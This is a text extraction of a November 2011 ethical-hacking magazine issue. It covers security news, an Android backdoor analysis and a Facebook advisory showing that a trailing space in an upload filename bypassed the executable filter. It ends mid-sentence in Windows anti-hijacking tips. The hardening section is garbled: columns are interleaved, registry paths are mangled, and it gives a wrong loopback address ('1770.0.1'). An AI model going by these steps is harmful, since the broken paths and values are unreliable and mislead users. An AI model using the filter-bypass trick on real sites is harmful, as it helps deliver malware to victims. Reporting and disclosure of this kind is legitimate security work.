CipherMagazine Nov2011 HQ

CiPHER
November 11
miable, displaying a friendly and pleasant manner, we here at Amiable are friendly and enthusiastic spirit. Amiable is all about reducing the monopoly on the knowledge and share it with everyone. Every day, literally thousands of talented, hard-working folks out there gain new insight from their work, come up with brilliant ideas and then share their experience with us. Amiable aims to lay a strong underpinning for the technical development of our country, by developing an active interest among youth in new technologies. Cipher Magazine delivers useful and innovative information to future Information Security personals, Ethical Hackers and developers. Our aim with the magazine is to inform our readers about the latest trends and techniques in Ethical Hacking World. We try to persuade you not with the quantity but with the quality of the information we present. The magazine is available free of cost on our website www.amiable.in. Our twelve issues in the year are devoted to the Ethical Hacking World, which will show you the hacking world from their perspective. It's an excellent opportunity to observe security trends on the market for the readers, and for companies to share their invaluable knowledge.
With the advent of technology, the world has been a better place to live in. Computer, mobiles, PDAs and robots are now day to day used things. With the advancement in technology there has always been a security threat. The magazine has been launched keeping in mind the security threat faced daily on the on the virtual world. ID thefts, viruses, malwares and security breaches made the virtual world a deadly place. Sharing of knowledge about security has been the theme of the magazine. We are a medium to share your knowledge with the world. Security Analysts who have been working in this filed for years should come forward to help people. Researchers can publish their researches and other security articles. Professional can write on security threats over the internet. Bloggers can contribute their blog. Students should come forward to publish their daily activities on security. I, at Amiable Technologies would like to request for contribution from Researchers, Professional, Bloggers, Enthusiasts and Students.
SHARE YOUR KNOWLEDGE

Advertise
Aakash Mishra
ads@amiable.in
The content of the magazine should not be edited and/or used in blogs and websites, content writers has copyrights on them. Magazine can be printed and distributed without Amiable Technologies' prior permission. The magazine should not be uploaded on any site other than www.amiable.in. The defaulters will be punished heavily under Cyber Criminal Acts.
www.amiable.in
Bouty For Fresh White Hat.....................................................................................1 Student Arrested for Hacking Thai PM's Account...................................................2 Android Malware Works on Remote Commands form Encrypted Blog...................3 Apache releases Security Advisory following Discovery of Backdoor threat by Context Researchers..............................................................................................4 Computer Virus Hits U.S. Drone Fleet.....................................................................5 18 Child Porn Websites Shut Down........................................................................5 Sony Ransacked in Huge Brute-Force Attack ..........................................................6 Sesame Street Hacked...........................................................................................6 Miley Cyrus Needs A Lesson.................................................................................7 Google Teams Up with Citizens Advice Bureau.....................................................7 Duqu: Son of Stuxnet............................................................................................8 Bug in Flash Player Mac Webcam Spying..............................................................9 Hackers Leak Citigroup CEO's Personal Data.........................................................9 Anonymous Hackers Shut Down Child Porn Website..........................................10 Microsofts YouTube Channel Hacked.................................................................11 Anonymous DDoS Oakland Police Site After Violence........................................12 China may have Hacked US Satellites..................................................................13 Fbs EXE Attachment Vulnerability......................................................................13 Kinect Challenge for Malcon 2011 has been Completed by Indian Security Researcher 'Shantanu Gawde'............................................................................14 Facebook Ticker is Exposing Your Information....................................................15 India Shuts Down Server in Duqu Virus Investigation.........................................16 Browser Hijacking...............................................................................................17 Password File through FTP..................................................................................19 Bypass BIOS Passwords.......................................................................................20 TCP Wrappers......................................................................................................23 Hack an Ethernet ADSL Router............................................................................25 SQL Injection.......................................................................................................26 How to Hide the Partitions?................................................................................29 Ultimate Google Search Tips...............................................................................29 Eject your drives in and out infinitely..................................................................35 Making a Trojan Virus in ProRat v1.9..................................................................35
November 2011
Bounty for
Fresh White Hat

Source: http://www.computerworlduk.com
NSS Labs is sweetening the pot for its ExploitHub marketplace by offering rewards to security gurus who can write working exploits for a dozen "high-value" vulnerabilities. The company, which has set aside $4,400 in reward money, plans to give $100 to $500 to the first people to submit a working exploit for the vulnerabilities. Ten of the vulnerabilities concern Microsoft's Internet Explorer browser and two were found in Adobe's Flash multimedia program. The exploits must be client-side remote exploits that can result in code execution. Proof-of-concept code and denial-ofservice conditions do not qualify. NSS Labs will pay the developer with American Express gift cards. Residents from countries that the US has a standing embargo against are not allowed to participate. NSS Labs said that those who win can then sell their exploits on ExploitHub, a marketplace the company set up for penetration testers to acquire exploits to test against their infrastructure. ExploitHub was set up to help with the development of penetration testing tools and to assist computer security researchers. Those who write the winning exploits may then sell their code on ExploitHub, with NSS Labs taking a 30% commission. Penetration testers can also make requests via the marketplace for exploits for specific vulnerabilities. Those who want to buy exploits are vetted by NSS Labs to ensure the marketplace is not abused.
www.amiable.in
November 2011
Student Arrested for
Hacking Thai PM's Account
Source: http://nakedsecurity.sophos.com
Thai authorities have arrested a university student who reportedly confessed to hacking the Twitter account of the country's prime minister. Police say Ekkavit Tongdeeworakul, 22, turned himself in Wednesday. They say he hijacked Prime Minister Yingluck Shinawatra's account on Sunday to post several tweets accusing her government of incompetence and cronyism. Ekkavit is anarchitecture student at Bangkok's Chulalongkorn University. 22-year-old Aekawit Thongdeeworakul, a fourth year architecture student at Chulalongkorn University, could face up to two years in prison if found guilty of illegally accessing computer systems without authorisation. Information and Communication Technology Minister Anudith Nakornthap says Ekkavit is accused of violating the Computer Crime Act by illegally accessing computer data and could face up to two years in prison. Anudith said he preferred not to reveal how the account was hacked. Remember folks - just because you can access someone else's email, Facebook or Twitter account without the owner's persmission doesn't ever mean it's an acceptable thing to do. In fact, it's breaking the law and could lead to you getting in a lot of trouble.
www.amiable.in
November 2011
Android Malware Works on Remote Commands form Encrypted Blog
This is the first known Android malware that reads blog posts and interprets these as commands. It can also download and install additional applications, therefore further compromising the affected device. To get a one-glance comprehensive view of the behavior of this Backdoor, refer to the Threat Diagram shown below.
Arrival Details
This backdoor may be unknowingly downloaded by a user while visiting malicious websites. It may be manually installed by a user. NOTES: This malware request the following permissions which it could use to perform malicious routines: Access network settings Access the Internet Control the vibrator Disable Keylock Make a Call Read low-level log files Read, and write contacts Restart applications Wake the device Write, read, receive, and send SMS It gathers the following device information: The configuration file contains settings of the malware, the package name to be downloaded, and download URL. As of this writing the package that is installed is "com.sec.android. touchScreen.server" and downloaded from the blog post in http://blog.{BLOCKED}.com.cn/s/blog _8440ab780100t0nf.html. The blog post contains encrypted messages that the malware interprets as its commands. It can also download other malicious applications from this blog post.
Solution
Minimum scan engine: 9.200 VSAPI OPR Pattern Version: 8.461.00 VSAPI OPR Pattern Release Date: 29 Sep 2011 Step 1
This malware gathers specific information from the infected device. It connects to a malicious URL to send the gathered information and get an XML configuration file. This backdoor may be unknowingly downloaded by a user while visiting malicious websites. It may be manually installed by a user. Technical Details File size: Varies File type: APK Initial samples received date: 27 Sep 2011
Build version IMEI IMSI Manufacturer Model OS version Pa c k a g e n a m e o f l e g i t i m a t e application SDK version It connects to the following URL to send the gathered information and retrieves an XML configuration file: http://b4.{BLOCKED}r.co.cc:8080/jk.a ction={information}
For Windows ME and XP users, before doing any scans, please make sure you disableSystem Restore to allow full scanning of your computer. Step 2 Scan your computer with your Trend Micro product to delete files detected as ANDROIDOS_ANSERVER.A If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further
www.amiable.in
November 2011
step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information. NOTES: Trend Micro Mobile Security Solution
Trend Micro has released an integrated solution for mobile devices, which provides automatic, real-time scanning to protect wireless devices against malicious code and viruses on the Web or hidden inside files. Download Trend Micro Mobile Security for Android.
Manual Removal Instructions Step 1: Select Settings > Application > Manage Applications Step 2: Select {Detected Application Name} then click Uninstall
Apache releases Security Advisory following

Discovery of Backdoor threat by Context Researchers
Source: http://www.contextis.com/news/ Apache released an advisory on Wednesday 5th October 2011 to all of its customers following the identification by Context's researchers of a new class of security vulnerability that could allow hackers to gain full internet access to internal or DMZ systems using insecurely configured reverse web proxies. Context alerted Apache to the weakness last month and have published a blog detailing this new class of attack that it believes is likely to affect other web servers and proxies. Reverse proxies are used to route external HTTP and HTTPS web requests to one of several internal web servers to access data and resources. Typical applications include load balancing, separating static from dynamic content, or to present a single interface to a number of different web servers at different paths. While other proxies may suffer from the same vulnerability, the specific attack identified by Context researchers was based on an Apache web server using the mod_rewrite proxy function, which uses a rule-based rewriting engine to modify and rewrite web requests dynamically. When the web proxies had not been configured securely, Context was able to use an easy-to-obtain hacking tool in order to force a change in the request to access internal or DMZ systems, including administration interfaces on firewalls, routers, web servers and databases. And if credentials on internal systems were weak, a full network compromise was possible including uploading Trojan WAR files to a server. This latest vulnerability presents a potential back door to sensitive internal or DMZ systems but is totally avoidable if the reverse proxies are properly configured, said Michael Jordon, Research and Development Manger at Context. We have not investigated other web servers and proxies but it reasonable to assume that the problem is more widespread. Full details of the reverse proxy bypass vulnerability are also documented in the Context blog published today at: http://www.contextis.com/research/blog/reverseproxybypass/.
Advertisement Here
Contact for space : ads@amiable.in
www.amiable.in
November 2011
Computer Virus Hits

Source: www.wired.com
U.S. Drone Fleet
A computer virus has infected the cockpits of America's Predator and Reaper drones, logging pilots' every keystroke as they remotely fly missions over Afghanistan and other war zones. The virus, first detected nearly two weeks ago by the military's Host-Based Security System, has not prevented pilots at Creech Air Force Base in Nevada from flying their missions overseas. Nor have there been any confirmed incidents of classified information being lost or sent to an outside source. But the virus has resisted multiple efforts to remove it from Creech's computers, network security specialists say. And the infection underscores the ongoing security risks in what has become the U.S. military's most important weapons system. The Air Force declined to comment directly on the virus. We generally do not discuss specific vulnerabilities, threats, or responses to our computer networks, since that helps people looking to exploit or attack our systems to refine their approach, says Lt. Col. Tadd Sholtis, a spokesman for Air Combat Command, which oversees the drones and all other Air Force tactical aircraft. We invest a lot in protecting and monitoring our systems to counter threats and ensure security, which includes a comprehensive response to viruses, worms, and other malware we discover. However, insiders say that senior officers at Creech are being briefed daily on the virus. It's getting a lot of attention, the source says. But no one's panicking. Yet.
18 Child Porn Websites
Shut Down
Source: http://www.fbi.gov/news In another example of the increasingly international nature of crime, a man was recently indicted on federal charges of running 18 Chinese-language child pornography websites out of his apartment in Flushing, New York. The websites were being advertised to Chinese-speaking individuals in China, in the U.S., and other countries. How it all started. In late 2010, the FBIthrough our legal attach office in Beijingreceived information from Chinese officials about their investigation of a large-scale child pornography website housed on U.S. servers. And one of their main suspects, a Chinese-born man, was living in New York. So our New York office opened an investigation under our Innocent Images National Initiative and instituted an undercover operation. One concrete outcome of this partnership? The Ministry of Public Security sent its first Chinese officer to join the FBI's Innocent Images International Task Force and receive specialized training on such topics as legal principals, emerging trends and technologies, and investigative techniques. Once the fall 2011 training session is completed, the task force will number 100 officers in 43 countries. Since its launch in 2004, the task force has built an international network of Internet child sexual exploitation investigators who share intelligence and work joint operations across national borders. Exactly what's needed to combat the many child pornographers using the Internet to extend their nefarious reach around the globe.
www.amiable.in
November 2011
Ransacked in Huge Brute-Force Attack

93,000 Accounts Broken Into
Source: http://www.theregister.co.uk Sony has warned users against a massive bruteforce attack against PlayStation and Sony network accounts. The attack which used password and user ID combinations from an unidentified third-party source succeeded in compromising 60,000 PlayStation Network and 33,000 Sony Online Entertainment network accounts. These accounts have been locked and passwords reset. Both the motive for the latest attack against Sony network users and the identity of the perpetrator(s) remains unclear. Sony shut down its PlayStation Network in April in the aftermath of a far more damaging hack attack. The service wasn't restored until a month later. Personal information on 77 million account-holders was exposed as a result of the April PlayStation hack. Details including names, addresses, passwords and purchase histories was exposed by the megahack. Sony was widely criticised for its handling of the incident, one of the biggest data breach incident (by volume of records) in history.
Hacked, Porn Posted

Source: http://www.pcworld.com
The Sesame Street channel on YouTube, a popular stop on the Internet for preschool children, was attacked by a hacker Sunday who deleted all videos from the channel, modified its design, and posted graphic porn to it. It took Google about 22 minutes to take down the offensive content, according to The Next Web. "YouTube's Community Guidelines prohibit graphic content," a YouTube representative told CNN. "As always, we remove inappropriate material as soon as we are made aware of it. Mredxwx 's innocence was defended on one Internet forum. "This appears to have been a venge-hack," asserted "lasernut" on Reddit, a social news site. "Essentially framing this person as the culprit behind this... Someone apparently wants to grief that person. This isn't the first time a site affiliated with the Public Broadcasting System has been the target of hackers. In May, the PBS News Hour blog was hacked and a phony news story planted on it that rappers Tupac Shakur and Biggie Smalls were still alive and living in New Zealand.
www.amiable.in
November 2011
Miley Cyrus Needs A Lesson

Source: http://crushable.com/entertainment With celebrity phone hacker Christopher Chaney arrested, another hacker has reached out to TMZ to share how laughably easy it was for him 'to hack intoMiley Cyrus Gmail account. Here's a lesson in the Internet, Miley: Don't use the name of your best friend (which the Internet knows) as your security question. First he tracked down her Gmail name; though he doesn't say what it is, I just did a quick Google search and came up with two possibilities through Yahoo! Answers already. Obviously that part won't take long. When he tried to log in, he got a security questionthe name of one of Miley's girlfriends. All the hacker had to do was search which girl Miley's been friends with the longest (could it have been Mandy, from their YouTube days?), and voila! At the same time, this is yet another sphere of their lives where celebs are obligated to have extra security. When every minute detail from your childhood nickname to your various tattoos are exhaustively detailed on Wikipedia and in magazine interviews, you have to keep some facts secret so that no one else can find them. Basically, Google yourselves before you go inputting any of these personal details as security measures. There's always a chance that the hacker contacting TMZ is Chaney using another email address but we can only hope he wouldn't be that stupid.
Google Teams Up with Citizens Advice Bureau

Source: http://www.telegraph.co.uk/technology/google Google is to launch a campaign promoting online safety in association with the Citizens Advice Bureau (CAB). Using adverts in newspapers, on public transport and online, the two organisations will encourage users to adopt secure passwords, log out of web browsers and computers when they've finished using them and even to adopt more complex ways of signing into their email accounts, known as 'two-factor authentication'. It will also cover child protection and the use of 'cookies' in web browsers. The campaign will be the first that Google has ever run promoting something other than a product, such as its web browser Chrome. It will primarily be funded by the search giant, in consultation the CAB. Google claimed the website and advertising campaign aim to empower users to tackle their online security concerns and make more informed decisions about their internet use. Anthony House, Google's Communications and Policy Manager added that Everyone wants to stay safe online, but many people aren't confident that they know how to.
www.amiable.in
November 2011
Duqu: Son of Stuxnet

Source: mocana.com/blog It had to happen: Someone has released the next-step toward the next-generation Stuxnet virus, although the target of this new virus is yet unclear. According to Symantec, the next threat, dubbed Duqu because the code has the code string ~DQ within it, is a surveillance-based Trojan horse, designed to relay information back to a command and control center. Duqu uses mock .jpg files along with other dummy files, all encrypted, to exfiltrate data. Unlike Stuxnet, which specifically damaged Siemens PCS 7 systems, Duqu appears to be only collecting information about the design of other industrial control systems. Duqu only has an active lifetime of about 36 days, but this is probably to limit its discovery. The Symantec report states the threat was written by the same authors, or those that have access to the Stuxnet source code, and appears to have been created after the last Stuxnet file we recovered. F-Secure's Mikko Hypponen tweeted Duqu's kernel driver (JMINET7.SYS) is so similar to Stuxnet's driver (MRXCLS.SYS) that our back-end systems actually thought it's Stuxnet. At this time Duqu does not propagate and has been released only within targeted industries, although Symantec admits it may also be elsewhere and not yet discovered. The original compile dates on some of the variants of Duqu so far analyzed suggest it may have existed as far back as November 3, 2010. Stuxnet compile dates were between June 2009 and March 2010 and therefore pre-date Duqu. Clues to Duqu's origin do exist. For example, it uses a digital certificate set to expire August 2, 2012, issued from a company in Taipei, Taiwan. F-Secure's Hypponen thinks the certificate might have been stolen from C-Media in Taiwan. Symantec says that certificate was revoked on October 14, 2011.
www.amiable.in
November 2011
Bug in Flash Player

Mac Webcam Spying
Source: http://www.theregister.co.uk
Engineers on 20th Oct patched a hole in Adobe's ubiquitous Flash Player that allowed website operators to silently eavesdrop on visitors' webcam and microphone feeds without permission. To be attacked, visitors needed to do no more than visit a malicious website and click on a handful of buttons like the ones in this live demonstration. Without warning, the visitor's camera and microphone were activated and the video and audio intercepted. The attack closely resembled a separate Flash-based attack on webcams from 2008 using a class of exploit known as clickjacking. Shortly after security researchers Jeremiah Grossman and Robert RSnake Hansen documented clickjacking in 2008, Adobe patched Flash to blunt attacks that exploited the program to surreptitiously spy on the millions of people who use it. Engineers closed the hole by changing the behavior of Flash security dialog box when it's set to be transparent. Aboukhadijeh was able to revive the attack by exploiting the settings manager, which until Thursday's fix, still allowed important settings to be made while it was in transparent mode. He said his demonstration worked only against Macs when using Firefox or Safari, and that a CSS opacity bug prevented it from working on other operating systems and browsers. It wouldn't have been surprising if additional research uncovered ways to make the attack more universal. Aboukhadijeh went on to say he went public after reporting the vulnerability to Adobe and getting no reply. It's been a few weeks and I haven't heard anything from Adobe yet, he said. I think it's worth sharing it with the world now, so that Adobe pays attention and fixes it more quickly.
Hackers Leak Citigroup CEO's Personal Data,

After Occupy Wall Street Arrests
Source: http://news.yahoo.com In retaliation for the arrest of protesters who tried to close their Citibank accounts, hackers sympathetic to the Occupy Wall Street movement have released personal information about Citigroup Chief Executive Officer Vikram Pandit. Data, including cell and office phone numbers, an email address, two home addresses, legal and financial information
www.amiable.in
November 2011
and information about Pandit's family, were all posted online by members of a hacker group known as CabinCr3w. The group affiliates itself with the loose-knit group Anonymous, which has a long history of high-profile hacks and data leaks. Anonymous members played a key role in promoting the original Occupy Wall Street protest, which began on September 17. A month later, the Occupy movement has spread to more than 900 cities around the world, primarily through the use of Twitter and other social media and Internet properties. Last week, Pandit said he would be happy to meet with Occupy Wall Street protesters, who blame the financial sector for the bad economy, and oppose its influence on US politics, reports Businessweek. He said their complaints are completely understandable.
Anonymous Hackers Shut Down Child Porn Website

Source: http://www.techradar.com/news/internet The hacking group known as Anonymous has claimed responsibility for shutting down a website used to share pictures of child abuse. The group released a statement saying it has begun targeting over 40 websites responsible for posting and sharing the indecent images, the largest of which being "Lolita City. Anonymous says it has published the login details for the site's 1,500 members online after hacking into the hosting company, Freedom Hosting. It had previously contacted the hosts requesting that the offending content, totalling over 100GB, be removed. The request which was ignored. The group, which spent much of 2011 targeting many of the tech world's most illustrious companies, also issued a warning to other hosting companies which enable child pornography to be shared. "Our demands are simple. Remove all child pornography content from your servers. Refuse to provide hosting services to any website dealing with child pornography," added the statement. "This statement is not just aimed at Freedom Hosting, but everyone on the internet. "It does not matter who you are, if we find you to be hosting, promoting, or supporting child pornography, you will become a target. Anonymous says the site was accessible through the Tor network which allows for complete online anonymity and defends internet users against surveillance. It it is widely used for posting illegal materials, but also for circumnavigating widespread internet censorship in countries like China and Iran.
Advertisement Here
www.amiable.in
10
November 2011
YouTube Channel Hacked

Source: http://nakedsecurity.sophos.com
Hackers have taken control of Microsoft's official YouTube channel, removed the company's videos and replaced them with ones of their own. It seems unlikely that the change to the YouTube channel is a bizarre publicity stunt by Microsoft. After all, what would be the sense in deleting its archive of past videos - many of which are embedded on third-party sites around the world. Although there are no details yet about how hackers managed to gain control of Microsoft's YouTube account, the obvious suspicion has to be that a Microsoft employee who had administrative rights over the channel was careless with their password. One YouTube user, however, has left a comment on one of the videos describing his theory on how Microsoft's YouTube account was compromised: This is how he "hacked" the channel: He legittly made the account Microsoft when youtube wasn't that big but the REAL Microsoft probably asked Youtube to disable it and give it to them. The flaw is that this account was probably still linked to this kid's email and microsoft forgot to change it or whatever. So all this kid had to do was recover this account using his old email. Not that hard. Thats probably how the other big Channels got "hacked". Thumbs this up so people can see! Regardless of how the hack occurred, it's embarrassing and inconvenient for Microsoft.
www.amiable.in
11
November 2011
Anonymous DDoS Oakland Police Site After Violence
Cyber activists associated with Anonymous have targeted the Oakland Police Department (OPD) and other law enforcement agencies that participated in a controversial crackdown against OccupyOakland protestors. A DDoS (Distributed Denial of Service) attack against the department's website www.oaklandpolice.com www.oaklandpolice.com is underway, and the website currently is unreachable. AnonyOps AnonyOps tweet 'I'm amazed and proud of #occupyOakland protesters who stood defiant, peaceful in the face of lethal force by Oakland PD.' Police fired a number of tear gas canisters, concussion grenades, rubber bullets and non-lethal rounds at demonstrators on Tuesday night, drawing widespread condemnation for the use of heavy-handed tactics against unarmed civilians. The attack was first announced via Anonymous' AnonOps Twitter feed. "@Anon_Central: Admin/User/Password Dump of oaklandnet.com Problem Oakland authorities? F--- you! >>pastebin.com/S8VRwRxQ #Anonymous," read AnonOps' tweet. Reports of police violence against Oakland protesters re-emerged Tuesday on the movement's Web site,occupyoakland.org. The Web site published statements charging the U.S. police of numerous acts of brutality, during a recent raid designed to evict protesters from their encampment. The most seriously injured victim was Scott Olsen, an Iraq War veteran, who suffered a fractured skull after being struck by a police projectile. His condition was upgraded to "fair" today, according to reports. According to the Pastebin document, Anonymous is offering a "no questions asked" $1,000 reward for information about the officer who threw the projectile at Olsen
www.amiable.in
12
November 2011
China may have Hacked US Satellites

Source: http://www.tgdaily.com/security-features A US congressional commission has confirmed that hackers "interfered" with two government satellites between 2007-2008 via a Norwegian ground station. According to Bloomberg, the Chinese military is suspected of executing the digital intrusions which targeted satellites used for earth climate and terrain observation. "Such interference poses numerous potential threats, particularly if achieved against satellites with more sensitive functions," read a final draft report authored by the U.S.-China Economic and Security Review Commission. "Access to a satellite's controls could allow an attacker to damage or destroy the satellite. An attacker could also deny or degrade as well as forge or otherwise manipulate the satellite's transmission. Indeed, a Landsat-7 earth observation satellite system experienced 12 or more minutes of interference in October 2007 and July 2008, while hackers tapped into a Terra AM-1 earth observation satellite twice, for two minutes in June 2008 and nine minutes in October that year. Interestingly enough, the report doesn't actually accuse the Chinese government of sponsoring or executing the four attacks. However, it clearly states that the breaches are "consistent" with Beijing's military doctrine which advocates disabling an enemy's space systems, and particularly "ground-based infrastructure, such as satellite control facilities. In a conflict, the Chinese would try to "compromise, disrupt, deny, degrade, deceive or destroy" US space and computer systems, the draft claims, an act which could "critically disrupt the military's ability to deploy and operate during a military contingency."
Fbs EXE Attachment Vulnerability

Can Compromise with Users Security
Summary: When using the Facebook 'Messages' tab, there is a feature to attach a file. Using this feature normally, the site won't allow a user to attach an executable file. A bug was discovered to subvert these security mechanisms. Note, you do NOT have to be friends with the user to send them a message with an attachment. Description: When attaching an executable file, Facebook will return an error message stating:
www.amiable.in
13
November 2011
Error Uploading: You cannot attach files of that type. When uploading a file attachment to Facebook we captured the web browsers POST request being sent to the web server. Inside this POST request reads the line: Content-Disposition: form-data; name=attachment; filename=cmd.exe It was discovered the variable 'filename' was being parsed to determine if the file type is allowed or not. To subvert the security mechanisms to allow an .exe file type, we modified the POST request by appending a space to our filename variable like so: filename=cmd.exe This was enough to trick the parser and allow our executable file to be attached and sent in a message.
Impact: Potentially allow an attacker to compromise a victim's computer system. Credits: Discovered by Nathan Power www.securitypentest.com
Kinect Challenge for Malcon 2011 has been Completed by

Indian Security Researcher 'Shantanu Gawde'
Only 15 years old, but Indian researcher 'Gawde' for MalCon 2011 has created a malware that utlizes Microsoft Kinect controller to secretly capture pictures and upload to a picasa account. With over 10 million devices sold till date, the kinect holds the Guiness book for world record for the fastest selling consumer electronics device - and is exactly the reason why the malware is a concern. In recent months, there have been a number of innovative Kinect hacks that make use of the Kinect using both Open-Source drivers and the Kinect SDK. The malware, code-named 'gawde' after its creators name, works on Windows 7 to secretly capture pictures of the victim / surroundings from a connected Kinect device and uploads them to a picasa account. Rajshekhar Murthy, Director at ISAC, (Information Sharing and Anaysis Center), a scientifc non-profit body that holds the International Malware Conference, MalCon said.
www.amiable.in
14
November 2011
"We believe that in coming years, a lot of windows based applications will be developed for Kinect and the device will gain further immense popularity and acceptance- and from a perpective of an attacker, such a popular device can be an exciting target for visual and audio intelligence. At MalCon research labs, we promote proactive security research and the malware utilizing Kinect is only a proof of concept. " The Kinect malware 'gawde' goes a step ahead and even uses voice recognition to execute a program based on keyword, without the knowledge of the victim. The malware PC will be demonstrated at the upcoming MalCon 2011 in Mumbai, India.
Facebook Ticker is Exposing

Your Information and Behavior
Without Your Knowledge

Source: http://www.riceoweek.com Nelson Novaes Neto, a Brazilian (independent) Security and Behavior Research have analyze a privacy issue in Facebook Ticker that allows any person chasing you without your knowledge or consent . He explain that this is not a code vulnerability, but here the whole issue is related to users privacy. Nelson said on his blog This tool monitor others began to run when it introduced a new feature called Ticker. This new feature (Ticker) does not respect the privacy settings and it now Comments (updates), add friends, likes and can be seen by others (friend *) anyone without your permission. * You really know a friend tell me if it is real or fake profile cloned? Nelson Give Proof of Concept with a very creative real life scenario. Check out a live demonstration, where a novel explains how the issue of privacy (you can use any browser to play it). Description: This is a scenario where your online behavior can be exposed without their knowledge through the new tool in Facebook called Ticker. I used four Facebook profiles to create this POC (proof of concept), where a woman was cheating on her husband on Facebook. Synopsis: A couple are a Facebook user, each with its own profile. One day her husband found his wife adding her ex-boyfriend as a friend and started talking to him. After her husband's become really angry, removed his wife's ex-boyfriend's profile. The wife also discovered that all comments (updates), added Likes and friends were available in your profile (Wall Wall) and visible to everyone her friend. She then removed all the updates (updates) and blocked new updates to be published automatically on your profile (Wall). Thus, her husband, so it could not be updated of their shares of his wife. After Facebook launched this new tool called Ticker, a friend of the couple (as have the two friends) saw that updates the wife of his friend appear in real time ticker, and told him his wife again added the ex-boyfriend and I was talking to him, writing in his posts and vice versa. The husband checked the profile of the wife, but found nothing there. His friend said that this new tool (Ticker) lets you see updates from anyone on your list of friends, as well as users that have been noted for his friends. What is happening? As the husband could not see anything (updates it) in the profile of his wife, but your friend can see everything from this thing called Ticker? The issue is now public , because according to Nelson, he reported this privacy issue to Facebook Secutiry team a few months ago and until now he haven't get any positive response from facebook. He said Considering I respect some code of ethics (that protect society, commonwealth and infrastructure.) I think it was going completely against users desires and worth to be shared with everyone.
www.amiable.in
15
November 2011
India Shuts Down Server

in
Duqu Virus Investigation

Source: http://www.msnbc.msn.com
Indian authorities seized computer equipment from a data center in Mumbai as part of an investigation into the Duqu malicious software that some security experts warned could be the next big cyber threat. Two workers at a web-hosting company called Web Werks told Reuters that officials from India's Department of Information Technology last week took several hard drives and other components from a server that security firm Symantec Corp told them was communicating with computers infected with Duqu. "This one is challenging," said Marty Edwards, director of the U.S. Department of Homeland Security's Industrial Control Systems Cyber Emergency Response Team. "It's a very complex piece of software. An official in India's Department of Information Technology who investigates cyber attacks also declined to discuss the matter. "I am not able to comment on any investigations," said Gulshan Rai, director of the Indian Computer Emergency Response Team, or CERT-In. In March, hackers stole digital security keys from EMC Corp's RSA Security division that they later used to breach the networks of defense contractor Lockheed Martin Corp. Researchers said they are still trying to figure out what the next phase of Duqu attacks might be. "We are a little bit behind in the game," said Don Jackson, a director of the Dell SecureWorks Counter Threat Unit. "Knowing what these guys are doing, they are probably a step ahead."
Advertisement Here
www.amiable.in
16
'Anonymous' Hackers Group Threat to New York Stock Exchange
November 2011
Browser Hijacking
Hackers and Browser Hijacking is one area of the Net that affects everyone at some stage. In addition to having third party utilities such as SpyBot, Anti Virus scanners and firewalls installed there are some changes that can be made to Windows 2000/XP. Below are some details to make your system safer from hackers and hijackers. Some of these tips require editing of the Registry so it is wise to either backup the registry and/or create a Restore Point. 1. Clearing the Page File at Shutdown: 4. Install Windows In a different directory: Windows 2000/XP paging file (Sometimes called the Swap File) can contain sensitive information such as plaintext passwords. Someone capable of accessing your system could scan that file and find its information. You can force windows to clear out this file. In the registry navigate to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSes sion ManagerMemory Management and add or edit the DWORD ClearPageFileAtShutdown. Set it to 1. Note that when you do this, the system will take much longer to shut down: a system with a really big Page File (1 GB or more) may take a minute or two longer. 2. Disable the POSIX and OS/2 Subsystem: Windows 2000 and XP come with little-documented subsystems it at allow compatibility with UNIX and OS/2 systems These rues systems are enabled by default but so rarely used that they are best off bring disabled completely to prevent possible service hijackings. To disable these subsystems, open the registry and navigate to
HKEY LOCAL MACHINESYSTEMCurrentControlSetControlSession
reboot. 3. Never leave default passwords blank: On installation, Windows 2000 sets up an Administrator account with total system access and prompts for a password. Guess what: by default, it allows that password to be blank. If a user doesn't want to type a password, he can simply click Next and the system will be an open door for anyone who wants to log on. Always opt for a password of some kind when setting up the default account on a machine.
Windows usually installs itself in the WINDOWS directory. Windows NT 4 0 and 2000 Will opt for WINNT. Many worms and other rogue programs assume this to be the case and attempt to exploit those folders files. To defeat this install Windows to another directory when you're setting it up - you can specify the name of the directory during setup. WINDIR is okay; so some people use WNDWS - A few (not that many) programs may not install properly if you Install Windows to another folder but t hey are very few and they are far between 5. Fake out hackers with a dummy Administrator account: Since the default account in Windows 2000 is always named Administrator, an enterprising hacker can try to break into your system by attempting to guess the password on that account. It you never bothered to put a password on that account, say your prayers. Rather than be a sucker to a hacker, put a password on the Administrator account it you haven't done so already. Then change the name of the Administrator account. You'll still be able to use the account under its new name, since Windows identifies user accounts by a back-end ID number rather than the name. Finally, create a new account named Administrator and disable it. This should frustrate any would -be break-ins.
ManagerSubSystems. Delete the subkeys Os2 and Posix then
www.amiable.in
17
111 Arrested for biggest identity theft and credit card fraud Case
November 2011
You can add new accounts and change the names of existing accounts in Windows 2000 through the Local Users and Groups snap in. Right-click on My Computer, select Manager, open the Local Users and Groups subtree, look in the Users folder and right-Click on any name to rename it. To add a new user, right-Click on the containing folder and select New User. Finally, to disable an account, double-Click it, check the Account is disabled box and Click OK. Don't ever delete the original Administrator account. Some programs refuse to install without it and you might have to log in under that account at some point to setup such software. The original Administrator account is configured with a security ID that must continue to be present in the system. 6. Disable the Guest account: Windows XP comes with a Guest account that's used for limited access, but it's still possible to do some damage with it. Disable it completely if you are not using it. Under Control Panel, select User Accounts, click on Guest Account and then select Turn Off the Guest Account. 7. Set the Hosts file to read-only to prevent name hijacking. This one's from (and to a degree, for) the experts. The HOSTS file is a text file that all flavors of Windows use to hold certain network addresses that never change. When a network name and address is placed in HOSTS, the computer uses the address listed there for that network name rather than performing a lookup (which can take time). Experts edit this file to place their most commonly-visited sites into it, speeding things up considerably. Unfortunately hijackers and hackers also love to put their own information into it - redirecting people from their favorite sites to places they don't want to go. One of the most common entries in HOSTS is local host which is set 1770.0.1. This refers to the local machine and if this entry is damaged the computer can behave very unpredictably. To prevent HOSTS from being hijacked, set it to read-only. Go to the folder %Systemroot%system32driversetc, right-click on HOSTS, select Properties check the Read-Only box and click OK. If you want to add your own entries to HOSTS, you can unprotect it before doing so, but always remember to set it to read-only after you're done. 8. Disallow changes to IE settings through IE: This is another anti hijacker tip. IE can be set so that any changes to its settings must be performed through the Internet icon in the Control Panel, rather than through IE's own interface. Some particularly unscrupulous programs or sites try to tamper with setting by accessing the Tools, Options menu in IE. You can disable this and still make changes to IE's settings through the Control Panel. Open the Registry and browse to HKEY_CURRENT_USER SoftwarePoliciesMicrosoftInternet ExplorerRestrictions. Create or edit a new DWORD value named NoBrowserUptions and set it to 